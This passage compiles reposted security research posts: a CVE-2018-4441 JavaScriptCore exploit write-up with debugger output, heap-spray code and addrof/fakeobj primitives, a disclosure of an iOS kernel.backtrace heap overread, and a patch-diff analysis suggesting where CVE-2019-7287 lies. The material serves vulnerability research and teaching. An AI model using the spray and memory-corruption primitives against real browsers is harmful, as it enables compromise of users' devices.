    arr.length = 0xfffffff0;
    // [5]
    arr.splice(0xfffffff0, 0, 1);
}
main();

Root Cause Analysis

Running the PoC inside a debugger we see that the binary crashes while trying to write to non-writable memory (EXC_BAD_ACCESS):

(lldb) r
Process 3018 launched: './jsc' (x86_64)
Process 3018 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x18000fe638)
    frame #0: 0x0000000100af8cd3 JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage(JSC::ExecState*, unsigned int, unsigned int, JSC::ArrayStorage*) + 675
JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage:
->  0x100af8cd3 <+675>: movq   $0x0, 0x10(%r13,%rdi,8)
    0x100af8cdc <+684>: incq   %rcx
    0x100af8cdf <+687>: incq   %rdx
    0x100af8ce2 <+690>: jne    0x100af8cd0    ; <+672>
Target 0: (jsc) stopped.
(lldb) p/x $r13
(unsigned long) $4 = 0x00000010000fe6a8
(lldb) p/x $rdi
(unsigned long) $5 = 0x00000000fffffff0
(lldb) memory region $r13+($rdi*8)
[0x00000017fa800000-0x0000001802800000) ---
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0x18000fe638)
  * frame #0: 0x0000000100af8cd3 JavaScriptCore`JSC::JSArray::unshiftCountWithArrayStorage(JSC::ExecState*, unsigned int, unsigned int, JSC::ArrayStorage*) + 675
    frame #1: 0x0000000100af8fc7 JavaScriptCore`JSC::JSArray::unshiftCountWithAnyIndexingType(JSC::ExecState*, unsigned int, unsigned int) + 215
    frame #2: 0x0000000100a6a1d5 JavaScriptCore`void JSC::unshift<(JSC::JSArray::ShiftCountMode)1>(JSC::ExecState*, JSC::JSObject*, unsigned int, unsigned int, unsigned int, unsigned int) + 181
    frame #3: 0x0000000100a61c4b JavaScriptCore`JSC::arrayProtoFuncSplice(JSC::ExecState*) + 4267
    [...]

To be more precise, the crash occurs in the following loop in JSArray::unshiftCountWithArrayStorage where it tries to clear (zero-initialize) the added vector’s elements:

// [...]
for (unsigned i = 0; i < count; i++) vector[i + startIndex].clear(); // [...] startIndex ($rdi) is 0xfffffff0, vector ($r13) points to 0x10000fe6a8 and the resulting offset leads to a non-writable address, hence the crash. PoC Analysis // [1] let arr = [1] // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6b0 // - Type: ArrayWithInt32 // - public length: 1 // - vector length: 1 Initially, create an array of type ArrayWithInt32. It can hold any kind of elements (such as objects or doubles) but it still doesn’t have an associated ArrayStorage or holes. The WebKit project gives a nice overview of the different array storage methods. In short, a JSArray without an ArrayStorage will have a butterfly structure of the following form: --==[[ JSArray (lldb) x/2gx -l1 0x107bb4340 0x107bb4340: 0x0108211500000062 <--- JSC::JSCell [*] 0x107bb4348: 0x00000010000fe6b0 <--- JSC::AuxiliaryBarrier<JSC::Butterfly *> m_butterfly +0 { 16} JSArray +0 { 16} JSC::JSNonFinalObject +0 { 16} JSC::JSObject [*] 01 08 21 15 00000062 +0 { 8} JSC::JSCell | | | | | +0 { 1} JSC::HeapCell | | | | +-------- +0 < 4> JSC::StructureID m_structureID; | | | +----------- +4 < 1> JSC::IndexingType m_indexingTypeAndMisc; | | +-------------- +5 < 1> JSC::JSType m_type; | +----------------- +6 < 1> JSC::TypeInfo::InlineTypeFlags m_flags; +-------------------- +7 < 1> JSC::CellState m_cellState; +8 < 8> JSC::AuxiliaryBarrier<JSC::Butterfly *> m_butterfly; +8 < 8> JSC::Butterfly * m_value; --==[[ Butterfly (lldb) x/2gx -l1 0x00000010000fe6b0-8 0x10000fe6a8: 0x0000000100000001 <--- JSC::IndexingHeader [*] 0x10000fe6b0: 0xffff000000000001 <--- arr[0] 0x10000fe6b8: 0x00000000badbeef0 <--- JSC::Scribble (uninitialized memory) [*] 00000001 00000001 | | | +-------- uint32_t JSC::IndexingHeader.u.lengths.publicLength +----------------- uint32_t JSC::IndexingHeader.u.lengths.vectorLength // [2] arr.length = 0x100000 // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0x100000 // - vector length: 1 // - m_numValuesInVector: 1 Next, set its length to 0x100000 and transision the array to an ArrayWithArrayStorage. Actually, setting the length of an array to anything greater than or equal to MIN_SPARSE_ARRAY_INDEX would transform it to ArrayWithArrayStorage. Additionally, just notice how the butterfly of an array with ArrayStorage points to the ArrayStorage instead of the first index of the array. 
--==[[ Butterfly (lldb) x/5gx -l1 0x00000010000fe6e8-8 0x10000fe6e0: 0x0000000100100000 <--- JSC::IndexingHeader 0x10000fe6e8: 0x0000000000000000 \___ JSC::ArrayStorage [*] 0x10000fe6f0: 0x0000000100000000 / 0x10000fe6f8: 0xffff000000000001 <--- m_vector[0], arr[0] 0x10000fe700: 0x00000000badbeef0 <--- JSC::Scribble (uninitialized memory) +0 { 24} ArrayStorage [*] 0000000000000000 --- +0 < 8> JSC::WriteBarrier<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> > m_sparseMap; 0000000100000000 +0 { 8} JSC::WriteBarrierBase<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> > | | +0 < 8> JSC::WriteBarrierBase<JSC::SparseArrayValueMap, WTF::DumbPtrTraits<JSC::SparseArrayValueMap> >::StorageType m_cell; | +----------- +8 < 4> unsigned int m_indexBias; +------------------- +12 < 4> unsigned int m_numValuesInVector; +16 < 8> JSC::WriteBarrier<JSC::Unknown, WTF::DumbValueTraits<JSC::Unknown> > [1] m_vector; // [3] arr.splice(0, 0x11) // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0xfffef // - vector length: 1 // - m_numValuesInVector: 0xfffffff0 JavaScriptCore implements splice using shift and unshift operations and decides between the two based on itemCount and actualDeleteCount. EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec) { // [...] unsigned actualStart = argumentClampedIndexFromStartOrEnd(exec, 0, length); // [...] unsigned actualDeleteCount = length - actualStart; if (exec->argumentCount() > 1) { double deleteCount = exec->uncheckedArgument(1).toInteger(exec); RETURN_IF_EXCEPTION(scope, encodedJSValue()); if (deleteCount < 0) actualDeleteCount = 0; else if (deleteCount > length - actualStart) actualDeleteCount = length - actualStart; else actualDeleteCount = static_cast<unsigned>(deleteCount); } // [...] unsigned itemCount = std::max<int>(exec->argumentCount() - 2, 0); if (itemCount < actualDeleteCount) { shift<JSArray::ShiftCountForSplice>(exec, thisObj, actualStart, actualDeleteCount, itemCount, length); RETURN_IF_EXCEPTION(scope, encodedJSValue()); } else if (itemCount > actualDeleteCount) { unshift<JSArray::ShiftCountForSplice>(exec, thisObj, actualStart, actualDeleteCount, itemCount, length); RETURN_IF_EXCEPTION(scope, encodedJSValue()); } // [...] } Thus, calling splice with itemCount < actualDeleteCount will eventually invoke JSArray::shiftCountWithArrayStorage. bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage) { // [...] // If the array contains holes or is otherwise in an abnormal state, // use the generic algorithm in ArrayPrototype. if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this)) || hasSparseMap() || shouldUseSlowPut(indexingType())) { return false; } // [...] storage->m_numValuesInVector -= count; // [...] } As it is also mentioned in the original bug report, assumming the array has neither indexed accessors nor any Proxy objects in the prototype chain, holesMustForwardToPrototype will return false and storage->m_numValuesInVector -= count will be called. In our case, count is equal to 0x11 and prior to the subtraction m_numValuesInVector is equal to 1, resulting in 0xfffffff0 as the final value. 
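To see the unsigned wrap-around concretely, here is a minimal C sketch using the same values as the PoC (one value in the vector, a splice count of 0x11). It mirrors the arithmetic only and is not the actual JSC code:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    /* Values as in the PoC: one element in the vector, splice removes 0x11. */
    uint32_t m_numValuesInVector = 1;
    uint32_t count  = 0x11;
    uint32_t length = 0x100000;        /* public length before step [4] */

    /* storage->m_numValuesInVector -= count; wraps around to 0xfffffff0 */
    m_numValuesInVector -= count;
    printf("m_numValuesInVector = 0x%x\n", m_numValuesInVector);

    /* hasHoles() == (m_numValuesInVector != length) */
    printf("hasHoles before step [4]: %d\n", m_numValuesInVector != length);

    /* step [4]: arr.length = 0xfffffff0 makes the two fields equal again */
    length = 0xfffffff0;
    printf("hasHoles after step [4]:  %d\n", m_numValuesInVector != length);
    return 0;
}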
// [4] arr.length = 0xfffffff0 // - Object @ 0x107bb4340 // - Butterfly @ 0x10000fe6e8 // - Type: ArrayWithArrayStorage // - public length: 0xfffffff0 // - vector length: 1 // - m_numValuesInVector: 0xfffffff0 At this point the value of m_numValuesInVector is under control. By setting the publicLength of the array to the value of m_numValuesInVector, hasHoles can be controlled as well. bool hasHoles() const { return m_numValuesInVector != length(); } It is worth mentioning that our control over m_numValuesInVector is very limited and is tightly related to the OOB read/write that will be discussed in more detail later. // [5] arr.splice(0xfffffff0, 0, 1) Finally splice is called with itemCount > actualDeleteCount in order to trigger unshift instead of shift. hasHoles returns false and we get OOB r/w in JSArray::unshiftCountWithArrayStorage. Exploitation Our plan is to leverage memmove in JSArray::unshiftCountWithArrayStorage into achieving addrof and fakeobj primitives. But before we do that, we have to set out an overall plan. There are three if-cases before the memmove call. bool JSArray::unshiftCountWithArrayStorage(ExecState* exec, unsigned startIndex, unsigned count, ArrayStorage* storage) { // [...] bool moveFront = !startIndex || startIndex < length / 2; // [1] if (moveFront && storage->m_indexBias >= count) { Butterfly* newButterfly = storage->butterfly()->unshift(structure(vm), count); storage = newButterfly->arrayStorage(); storage->m_indexBias -= count; storage->setVectorLength(vectorLength + count); setButterfly(vm, newButterfly); // [2] } else if (!moveFront && vectorLength - length >= count) storage = storage->butterfly()->arrayStorage(); // [3] else if (unshiftCountSlowCase(locker, vm, deferGC, moveFront, count)) storage = arrayStorage(); else { throwOutOfMemoryError(exec, scope); return true; } WriteBarrier<Unknown>* vector = storage->m_vector; if (startIndex) { if (moveFront) // [4] memmove(vector, vector + count, startIndex * sizeof(JSValue)); else if (length - startIndex) // [5] memmove(vector + startIndex + count, vector + startIndex, (length - startIndex) * sizeof(JSValue)); } // [...] } Initially, we discarded case [1] and [3] since they’ll reallocate the current butterfly, leading to what we (wrongfully) assumed an unreliable memmove due to the fact that we can’t predict (turns out we can) where will the newly allocated butterfly land. With that in mind, we moved on with [2], but quickly stumbled upon a dead-end. If we were to take that route, we’d have to make moveFront false. To do that, startIndex has to be non-zero and greater than or equal to length/2. This ends up being a bummer because [4] will copy at least length/2 * 8 bytes. That’s a pretty gigantic number if you recall how we got to that code path in the first place. To cut to the chase, right after the memmove call we got a crash. We didn’t investigate the root cause any further, but since we memmove a big amount of memory, we believe some objects/structures adjacent to the butterfly are corrupted. Maybe by spraying a bunch of 0x100000 size JSArrays you could get around that, maybe not. We thought it was too dirty and abandoned the idea. Spray to slay At that point, we decided to browse through older exploits. niklasb came to the rescue with his exploit. In short, his code makes holes of certain size objects in the heap and reliably allocates them back. That felt ideal for [1] and [3]. 
Here’s how we adapted that approach to meet our exploitation criteria: let SPRAY_SIZE = 0x3000; // [a] let spray = new Array(SPRAY_SIZE); // [b] for (let i = 0; i < 0x3000; i += 3) { // ArrayWithDouble, will allocate 0x60, will be free'd spray[i] = [13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37+i]; // ArrayWithContiguous, will allocate 0x60, will be corrupted for fakeobj spray[i+1] = [{},{},{},{},{},{},{},{},{},{}]; // ArrayWithDouble, will allocate 0x60, will be corrupted for addrof spray[i+2] = [13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37,13.37+i]; } // [c] for (let i = 0; i < 1000; i += 3) spray[i] = null; // [d] gc(); // [e] for (let i = 0; i < SPRAY_SIZE; i += 3) // corrupt butterfly's length field spray[i+1][0] = i2f(1337) What we’re practically doing is [a] create an array, root a bunch of arrays of certain size in it, [c] remove their references to them and finally [d] trigger gc, resulting to heap holes of that size. We use this logic in our exploit in order to get a reallocated butterfly literally next to a victim/sprayed object of ours that we wish to corrupt. In case you didn’t notice, each spray index is a JSArray of size 10. Why 10? After a couple of test runs, while debugging all the way to the butterfly allocation in Butterfly::tryCreateUninitialized, we ended up with arr.splice(1000, 1, 1, 1). We noticed that the reallocated size will be 0x58 (rounded up to 0x60). This is the exact size of a JSArray whose butterfly holds 10 elements. Let’s visualize how does that spray look like in memory. ... +0x0000: 0x0000000d0000000a ----------+ +0x0000: 0x402abd70a3d70a3d | +0x0008: 0x402abd70a3d70a3d | +0x0010: 0x402abd70a3d70a3d | +0x0018: 0x402abd70a3d70a3d | +0x0020: 0x402abd70a3d70a3d spray[i], ArrayWithDouble +0x0028: 0x402abd70a3d70a3d | +0x0030: 0x402abd70a3d70a3d | +0x0038: 0x402abd70a3d70a3d | +0x0040: 0x402abd70a3d70a3d | +0x0048: 0x402abd70a3d70a3d ----------+ ... +0x0068: 0x0000000d0000000a ----------+ +0x0070: 0x00007fffaf7c83c0 | +0x0078: 0x00007fffaf7b0080 | +0x0080: 0x00007fffaf7b00c0 | +0x0088: 0x00007fffaf7b0100 | +0x0090: 0x00007fffaf7b0140 spray[i+1], ArrayWithContiguous +0x0098: 0x00007fffaf7b0180 | +0x00a0: 0x00007fffaf7b01c0 | +0x00a8: 0x00007fffaf7b0200 | +0x00b0: 0x00007fffaf7b0240 | +0x00b8: 0x00007fffaf7b0280 ----------+ ... +0x00d8: 0x0000000d0000000a ----------+ +0x00e0: 0x402abd70a3d70a3d | +0x00e8: 0x402abd70a3d70a3d | +0x00f0: 0x402abd70a3d70a3d | +0x00f8: 0x402abd70a3d70a3d | +0x0100: 0x402abd70a3d70a3d spray[i+2], ArrayWithDouble +0x0108: 0x402abd70a3d70a3d | +0x0110: 0x402abd70a3d70a3d | +0x0118: 0x402abd70a3d70a3d | +0x0120: 0x402abd70a3d70a3d | +0x0128: 0x402abd70a3d70a3d ----------+ ... The goal of [c] and [d] is to land a reallocated butterfly at spray. Note we have control of both startIndex and count. startIndex represents the index where we want to start adding/deleting elements and count represents the actual number of added elements. For instance, arr.splice(1000, 1, 1, 1) gives a startIndex of 1000 and a count of 1 (if you think about it, we delete 1 element and add [1,1], essentially adding one element). Indeed, it’d be quite convenient if we landed that idea. In particular, with those numbers at hand, the memmove call at [4] translates to this: // [...] WriteBarrier<Unknown>* vector = storage->m_vector; if (1000) { if (1) memmove(vector, vector + 1, 1000 * sizeof(JSValue)); } // [...] Essentially, we’ll be moving memory “backwards”. 
For example, assuming Butterfly::tryCreateUninitialized returns spray[6], then you can think of [4] as: for (j = 0; j < startIndex; i++) spray[6][j] = spray[6][j+1]; This is how we’ll overwrite the length header field of the adjacent array’s butterfly, leading to an OOB and finally to a sweet addrof/fakeobj primitive. This is how the memory looks like right before [4]: ... +0x0000: 0x00000000badbeef0 <--- vector +0x0008: 0x0000000000000000 +0x0010: 0x00000000badbeef0 +0x0018: 0x00000000badbeef0 +0x0020: 0x00000000badbeef0 |vectlen| |publen| +0x0028: 0x0000000d0000000a ---------+ +0x0030: 0x0001000000000539 | +0x0038: 0x00007fffaf734dc0 | +0x0040: 0x00007fffaf734e00 | +0x0048: 0x00007fffaf734e40 | +0x0050: 0x00007fffaf734e80 spray[688] +0x0058: 0x00007fffaf734ec0 | +0x0060: 0x00007fffaf734f00 | +0x0068: 0x00007fffaf734f40 | +0x0070: 0x00007fffaf734f80 | +0x0078: 0x00007fffaf734fc0 ---------+ ... +0x0098: 0x0000000d0000000a ---------+ +0x00a0: 0x402abd70a3d70a3d | +0x00a8: 0x402abd70a3d70a3d | +0x00b0: 0x402abd70a3d70a3d | +0x00b8: 0x402abd70a3d70a3d | +0x00c0: 0x402abd70a3d70a3d spray[689] +0x00c8: 0x402abd70a3d70a3d | +0x00d0: 0x402abd70a3d70a3d | +0x00d8: 0x402abd70a3d70a3d | +0x00e0: 0x402abd70a3d70a3d | +0x00e8: 0x4085e2f5c28f5c29 ---------+ ... And here’s the aftermath. Pay close attention to spray[688]’s vectorLength and publicLength fields: ... +0x0020: 0x0000000d0000000a |vectlen| |publen| +0x0028: 0x0001000000000539 --------+ +0x0030: 0x00007fffaf734dc0 | +0x0038: 0x00007fffaf734e00 | +0x0040: 0x00007fffaf734e40 | +0x0048: 0x00007fffaf734e80 | +0x0050: 0x00007fffaf734ec0 spray[688] +0x0058: 0x00007fffaf734f00 | +0x0060: 0x00007fffaf734f40 | +0x0068: 0x00007fffaf734f80 | +0x0070: 0x00007fffaf734fc0 | +0x0078: 0x0000000000000000 --------+ ... We’ve successfully overwritten spray[688]’s length. It’s pretty much game over. addrof and fakeobj let oob_boxed = spray[688]; // ArrayWithContiguous let oob_unboxed = spray[689]; // ArrayWithDouble let stage1 = { addrof: function(obj) { oob_boxed[14] = obj; return f2i(oob_unboxed[0]); }, fakeobj: function(addr) { oob_unboxed[0] = i2f(addr); return oob_boxed[14]; }, test: function() { var addr = this.addrof({a: 0x1337}); var x = this.fakeobj(addr); if (x.a != 0x1337) { fail(1); } print('[+] Got addrof and fakeobj primitives \\o/'); } } We’ll use oob_boxed, whose length we overwrote, to write an object’s address inside oob_unboxed, in order to construct our addrof primitive and lastly use oob_unboxed to place arbitrary addresses in it and be able to interpret them as objects via oob_boxed. The rest of the exploit is plug n’ play code used in almost every exploit; Spraying structures and using named properties for arbitrary read/write. w00dl3cs has done a great job explaining that part here so we’ll leave it at that. Conclusion CVE-2018-4441 was fixed in commit 51a62eb53815863a1bd2dd946d12f383e8695db0. We’ll release our exploit shortly after we clean it up a bit. If you have any questions/suggestions, feel free to contact us on twitter. References Attacking JavaScript Engines instanceof exploit write-up by w00dl3cs array overflow exploit by niklasb Sursa: https://melligra.fun/webkit/2019/02/15/cve-2018-4441/
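The spray code above relies on i2f()/f2i() helpers that are not shown in the excerpt; in the JavaScript exploit they are typically built from typed arrays. The underlying bit-level reinterpretation between a 64-bit value and an IEEE-754 double, which is what makes the overlapping ArrayWithContiguous/ArrayWithDouble butterflies usable as addrof/fakeobj, can be sketched in C as follows (illustration only, the address value is made up):

#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Reinterpret a 64-bit integer as a double and back, the same trick the
 * JS i2f()/f2i() helpers perform with typed arrays. */
static double   i2f(uint64_t i) { double d;   memcpy(&d, &i, sizeof(d)); return d; }
static uint64_t f2i(double d)   { uint64_t i; memcpy(&i, &d, sizeof(i)); return i; }

int main(void)
{
    /* A made-up "JSObject pointer" value for illustration. */
    uint64_t fake_addr = 0x00007fffaf734dc0ULL;

    /* fakeobj direction: write the address bits as a double into the
     * unboxed array, then read the same slot through the boxed array.   */
    double as_double = i2f(fake_addr);

    /* addrof direction: read the slot back as a double and recover bits. */
    uint64_t recovered = f2i(as_double);

    printf("address 0x%llx <-> double bits 0x%llx\n",
           (unsigned long long)fake_addr, (unsigned long long)recovered);
    return 0;
}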
-
iOS kernel.backtrace Information Leak Vulnerability Posted: 2019-02-22 09:00 by Stefan Esser | More posts about Blog iOS Kernel Informationleak Vulnerability Intro In our iOS Kernel Internals for Security Researchers training at offensive_con we let our trainees look at some code that Apple introduced to the kernel in iOS 10. This code implements a new sysctl handler for the kernel.backtrace sysctl. This sysctl is meant to retrieve the current thread's user level backtrace. The idea behind this exercise is to see if the trainees can spot a 0-day information leak vulnerability in the iOS kernel if they are already pointed in the right direction. kernel.backtrace The kernel.backtrace sysctl is a relatively new addition to the iOS kernel that lets the current process retrieve its own user level backtrace. While the logic for determining the user level backtrace is buried somewhere in the Mach part of the kernel source code, the sysctl handler itself is implemented in the file /bsd/kern/kern_backtrace.c. The code for the handler is shown below.
48 static int
49 backtrace_sysctl SYSCTL_HANDLER_ARGS
50 {
51 #pragma unused(oidp, arg2)
52     uintptr_t *bt;
53     uint32_t bt_len, bt_filled;
54     uintptr_t type = (uintptr_t)arg1;
55     bool user_64;
56     int err = 0;
57
58     if (type != BACKTRACE_USER) {
59         return EINVAL;
60     }
61
62     if (req->oldptr == USER_ADDR_NULL || req->oldlen == 0) {
63         return EFAULT;
64     }
65
66     bt_len = req->oldlen > MAX_BACKTRACE ? MAX_BACKTRACE : req->oldlen;
67     bt = kalloc(sizeof(uintptr_t) * bt_len);
68     if (!bt) {
69         return ENOBUFS;
70     }
71
72     err = backtrace_user(bt, bt_len, &bt_filled, &user_64);
73     if (err) {
74         goto out;
75     }
76
77     err = copyout(bt, req->oldptr, bt_filled * sizeof(uint64_t));
78     if (err) {
79         goto out;
80     }
81     req->oldidx = bt_filled;
82
83 out:
84     kfree(bt, sizeof(uintptr_t) * bt_len);
85     return err;
86 }
The code above will first validate the incoming arguments and limit the depth of the backtrace that can be retrieved (lines 58-66). It will then allocate a heap buffer to store a backtrace of the user-selected depth in line 67 and use an external helper function to fill the buffer with the user level backtrace (line 72). The retrieved backtrace is then copied to user land (line 77) and the heap buffer is released (line 84). The Vulnerability Before reading any further I suggest that you take a look at the code above again and try to spot the vulnerability yourself without help. Only one hint should be given: the vulnerability can only be exploited on older iOS/watchOS/tvOS devices. Please do not read further before you have given yourself a chance to spot the vulnerability. I am serious! Please try to first spot the vulnerability yourself. The fact that you are reading this means you either ignored the three warnings above or you have already looked at the code yourself and either spotted the vulnerability or given up after a reasonable amount of time looking at the code. So let us figure out the problem together. Let us have a look at the line that copies the backtrace to user land.
77     err = copyout(bt, req->oldptr, bt_filled * sizeof(uint64_t));
78     if (err) {
79         goto out;
80     }
As you can see, the number of bytes copied to user land is bt_filled * sizeof(uint64_t). This is the number of filled-out backtrace entries times 8 bytes. And now let us have a look at how big the heap buffer is that we are dealing with.
67     bt = kalloc(sizeof(uintptr_t) * bt_len);
68     if (!bt) {
69         return ENOBUFS;
70     }
We can see here that the size of the heap buffer is determined by the formula sizeof(uintptr_t) * bt_len. This is the maximum number of backtrace entries to retrieve times the size of a pointer. And this is where our previous hint kicks in: the size of a pointer is only 8 bytes on recent devices. Older iOS devices (iPhone 5c and below) and older Apple Watches (Series 3) are internally 32 bit devices and therefore have only 4 byte pointers. This means that on these older devices the call to copyout() is allowed to copy twice as many bytes from the heap as the buffer actually holds. This is a classic heap buffer overread vulnerability. The Impact As pointed out this is a 0-day kernel information leak vulnerability that has not been shared with Apple before now and therefore it is still unfixed in the kernel. However there are a number of mitigating factors:
the vulnerability affects only 32 bit iOS devices - the only devices Apple still supports in current releases that are 32 bit are Apple Watch Series 3 and below
the vulnerability can only be triggered outside of the app sandbox - so it can only be used as part of a vulnerability chain and not exploited directly from an app
iOS 12 copyin/copyout Mitigation Starting with iOS 12 Apple has added a mitigation to the kernel that checks, whenever copyin() or copyout() is executed, whether the kernel's heap buffer is large enough for the operation to continue. The kernel will panic if an attacker tries to read or write across the boundary of a kernel zone heap element. However this mitigation does not stop an attacker from exploiting this vulnerability because Apple did not add this protection to 32 bit kernels. It is unknown if they simply forgot to protect their remaining 32 bit devices or if they simply do not care about them at all anymore. The Apple Security Bounty The value of this security vulnerability in the eyes of Apple's security bounty program is exactly 0 USD. There are three reasons for this:
Apple only pays for vulnerabilities affecting the latest of their devices. It doesn't matter if they officially still support older devices by providing them with updates. They will only pay if the bugs affect the recent devices.
Apple does not pay for vulnerabilities that affect MacOS / tvOS / WatchOS. They might only pay if iOS devices are affected.
Apple does not pay for information leak vulnerabilities although many of their mitigations rely on kernel memory being kept confidential.
Conclusion This vulnerability is one of those things that are hard to explain. It is in relatively new code, so we would assume that kernel developers these days should be careful when writing new code. So it is rather a mystery why two different data types are used for the allocation and for copying the data. It is furthermore hard to explain why a security review of the new kernel code, which should happen every time new code is added, did not spot this. The use of two different data types for allocation and copying is pretty obvious, and trainees at offensive_con who were just learning about the kernel were pretty fast in seeing the problem. Trainings If you are interested in this kind of content please consider signing up for one of our upcoming trainings. Stefan Esser Sursa: https://www.antid0te.com/blog/19-02-22-ios-kernel-backtrace-information-leak-vulnerability.html
-
Is CVE-2019-7287 hidden in ProvInfoIOKitUserClient? Posted: 2019-02-24 00:00 by Stefan Esser | More posts about Blog iOS Kernel CVE-2019-7287 ProvInfoIOKitUserClient ProvInfoIOKit Vulnerability Intro On February 8th 2019 Apple released the iOS 12.1.4 update that fixed a previously disclosed security vulnerability in Facetime group conferences that was heavily discussed in the media the week before. However with the same update Apple fixed a number of other vulnerabilities as documented in the usual place. While it is not uncommon for Apple to fix multiple security problems with the same update, a tweet from Google's Project Zero made the public aware that two of these vulnerabilities were apparently found being exploited in the wild. Since then more than two weeks have passed and neither Google nor Apple have given out any details about this incident, which leaves the rest of the world in the dark about what exactly happened, how Google was able to catch a chain of iOS 0-day vulnerabilities in the wild and where exactly the vulnerabilities are located. As usual Apple security notes contain only very brief descriptions of what was fixed. So it is no surprise that all they disclose about these vulnerabilities is the following. Foundation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-7286: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero IOKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-7287: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero This information is very unsatisfying and therefore we decided to have a look into what was actually fixed. Because we usually concentrate on the iOS kernel we tried to figure out what vulnerability is hiding behind CVE-2019-7287 by binary diffing the iOS 12.1.3 and the iOS 12.1.4 kernels. Patch Analysis Analysing iOS security patches has become a lot easier since the last time iOS malware was caught in the wild. With the release of iOS 10 Apple started to ship the iOS kernel in the firmware in decrypted form to be more open. But then they recently decided with iOS 12 to backpedal on this openness by stripping all symbols from the shipped kernels. However due to a mistake they shipped a fully symbolized iOS 12 kernel during the development stages that was immediately uploaded to Hex-Rays' Lumina service. Without symbols, analysing patches becomes a bit more difficult; however, in this case the functions in question even have strings in them that point to the problem directly. Once you have extracted the two kernels from the firmware they can be analysed for differences. We have used the open source binary diffing plugin Diaphora for IDA to perform this task. For our comparison we loaded the iOS 12.1.3 kernel into IDA, then waited for the autoanalysis to finish and then used Diaphora to dump the current IDA database into the SQLite database format Diaphora uses.
We repeated this process with the iOS 12.1.4 kernel and then told Diaphora to diff the two databases using its slow heuristics overnight. The result of this comparison showed only a very small number of partially changed functions. When looking at these functions we believe the vulnerability is likely in the function ProvInfoIOKitUserClient::ucGetEncryptedSeedSegment. The reason we believe this is that Apple introduced a new size check in this function. Have a look at the previous version of the function. And now have a look at the fixed version in iOS 12.1.4. You can clearly see the newly introduced size check in the area marked in red, with a clear error message attached to it. ProvInfoIOKitUserClient The IOKit objects ProvInfoIOKit and ProvInfoIOKitUserClient are implemented in a driver called com.apple.driver.ProvInfoIOKit. Connections to this driver cannot be created from the normal container sandbox that iOS applications run in. This means there is likely a sandbox escape involved in the full iOS exploitation chain that Google found. Alternatively the exploit chain could exploit one of the daemons that have legitimate access to this driver. A check of the sandbox profiles as shipped with iOS 12 reveals that there are three daemon sandboxes that are allowed to access this driver. These daemon sandboxes are:
findmydeviced
mobileactivationd
identityserviced
Which route to this driver was taken by the original attackers we can only guess until Apple or Google finally decide to reveal this information to the public. All this is assuming that our guess is right and the newly introduced size check is actually the fix for CVE-2019-7287. Having pinpointed the newly introduced size check in ProvInfoIOKitUserClient::ucGetEncryptedSeedSegment, the next step is to find out how this function can actually be called from the outside. As it turns out this function is directly exposed to userland via the externalMethod interface of the driver. A check of ProvInfoIOKitUserClient::getTargetAndMethodForIndex reveals that the driver offers 6 different external methods to userland. These methods are:
ucGenerateSeed (obfuscated name: fpXqy2dxjQo7)
ucGenerateInFieldSeed (obfuscated name: afpHseTGo8s)
ucExchangeWithHoover (obfuscated name: AEWpRs)
ucGetEncryptedSeedSegment
ucEncryptSUInfo
ucEncryptWithWrapperKey
The interesting thing here is that the first three external methods have obfuscated names in the leaked symbols. However all six routines have very explicit strings in them that reveal their name. Checking into the other external methods we were in for a surprise. The Surprise When looking into ucEncryptSUInfo and ucEncryptWithWrapperKey we were surprised to see that both of these functions have also been changed. Both have also gotten new size checks. Yet neither of these functions showed up in our Diaphora output. At some point we may want to go back and try to figure out why Diaphora did not see these functions as changed (or maybe they changed too much for the functions to be matched). When you look at these functions and the introduced size checks you will also see that directly after the size check there are calls to memmove. When you look at the calls to memmove it seems that before the size checks were introduced the code fully trusted user-supplied size fields in the incoming parameter structure. This likely led to arbitrary sized heap memory corruptions. We will take a look into this in the coming days to verify this educated guess.
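To make the suspected bug class more concrete, here is a hedged, hypothetical sketch of the pattern described above. The structure, field names and sizes are invented for illustration only and are not Apple's actual code:

#include <stdint.h>
#include <string.h>

/* Hypothetical sketch of the suspected pattern -- NOT Apple's code.
 * Field names and sizes are made up for illustration. */
struct su_info_in {
    uint32_t blob_len;      /* attacker-controlled length field   */
    uint8_t  blob[64];      /* inline data supplied by the caller */
};

#define DST_SIZE 64

/* Vulnerable pattern: the length comes straight from the input structure. */
static void encrypt_su_info_unsafe(struct su_info_in *in, uint8_t *dst) {
    memmove(dst, in->blob, in->blob_len);   /* OOB write if blob_len > DST_SIZE */
}

/* Patched pattern: reject oversized requests before copying,
 * analogous to the size checks introduced in iOS 12.1.4. */
static int encrypt_su_info_checked(struct su_info_in *in, uint8_t *dst) {
    if (in->blob_len > DST_SIZE)
        return -1;
    memmove(dst, in->blob, in->blob_len);
    return 0;
}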
